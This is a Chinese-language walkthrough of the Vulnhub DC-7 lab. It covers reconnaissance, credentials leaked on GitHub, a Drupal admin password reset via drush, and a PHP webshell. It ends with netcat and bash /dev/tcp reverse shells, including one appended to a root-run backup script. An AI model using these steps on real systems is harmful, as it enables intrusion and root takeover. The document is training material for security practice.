Vulnhub靶場----7、DC-7

文章目錄

• 一、環境搭建
• 二、滲透流程
• 三、思路總結

一、環境搭建

DC-7下載下傳位址：https://download.vulnhub.com/dc/DC-7.zip

kali：192.168.144.148

DC-7：192.168.144.155

二、滲透流程

nmap -T5 -A -p- -sV -sT 192.168.144.155
           

思路：

1、80端口

目錄掃描：dirb、gobuster、dirsearch等工具；

web站點資産識别：goby、whatweb等；

web站點功能頁面；

分析網頁源代碼；

……

2、22端口

ssh爆破、有賬号密碼資訊進行遠端登入

……

站點為

Drupal

，并且發現一個

@Dc7User

谷歌發現githu位址：

https://github.com/Dc7User/staffdb.git

通路

https://github.com/Dc7User/staffdb.git

，其存在

config.php

檔案，儲存資料庫相關資訊：username：password=

dc7user：MdR3xOgB7#dW

#shh登入：
 ssh [email protected]
           

ls

backups檔案夾下.gpg格式檔案（基于密鑰的加密方式）

cat mbox

發現

/opt/scripts/backups.sh

（可以執行的腳本檔案）

cd /opt/scripts/
cat backups.sh
           

發現

drush

：drush全稱：drupal shell，

是專門管理drupal站點的shell

。

并且drush指令要在

網站根目錄

執行。

drush user-password username --password="password"

#更改密碼

cd /var/www/html
drush user-password username --password="pass"  #更改密碼
           

使用

admin：pass

登入網站

點選Add content–>Basic page，無法執行php代碼

因為安全問題，不支援執行php代碼，但是可以通過安裝插件的方式使其支援執行php

插件下載下傳位址：https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
           

發現已經支援php代碼，在Basic page頁面插入一句話木馬

蟻劍連接配接傳回的url位址：http://192.168.144.155/node/7

在蟻劍上執行反彈shell指令，将shell反彈到kali上

kali監聽：

nc -lnvp 4444

蟻劍終端執行：

nc -e /bin/sh 192.168.144.148 4444

backups.sh檔案是root執行的，那我們可以把反彈shell寫入執行，擷取到的權限也是root權限

kali開啟監聽：

nc -lnvp 1234

反彈shell：

echo "bash -i >& /dev/tcp/192.168.144.148/1234 0>&1" >> /opt/scripts/backups.sh

郵件内容提示：15分鐘才會看到shell，是以上一步驟執行反彈shell擷取不到的，可以稍等一會再檢視

三、思路總結

1、資訊收集
2、github洩露敏感資訊
3、通過洩露的賬号密碼遠端登入
4、利用drush執行更改密碼操作
5、通過賬号密碼登入站點
6、通過添加插件執行php一句話木馬擷取shell
7、将反彈shell，寫入利用root權限的可執行腳本檔案中，擷取root權限。
           

參考連結：https://blog.mzfr.me/vulnhub-writeups/2019-08-31-DC7